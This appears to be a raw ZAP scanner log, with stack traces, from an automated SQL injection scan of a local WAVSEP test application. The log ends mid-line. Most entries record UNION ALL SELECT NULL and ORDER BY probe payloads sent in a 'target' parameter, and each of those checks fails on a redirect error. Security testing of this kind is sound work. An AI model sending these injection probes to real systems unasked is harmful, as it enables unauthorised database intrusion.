org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681541 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681542 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681543 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681543 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681543 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681544 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681545 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 4394#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 4394# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681546 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681547 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681548 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681548 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681549 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681550 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown 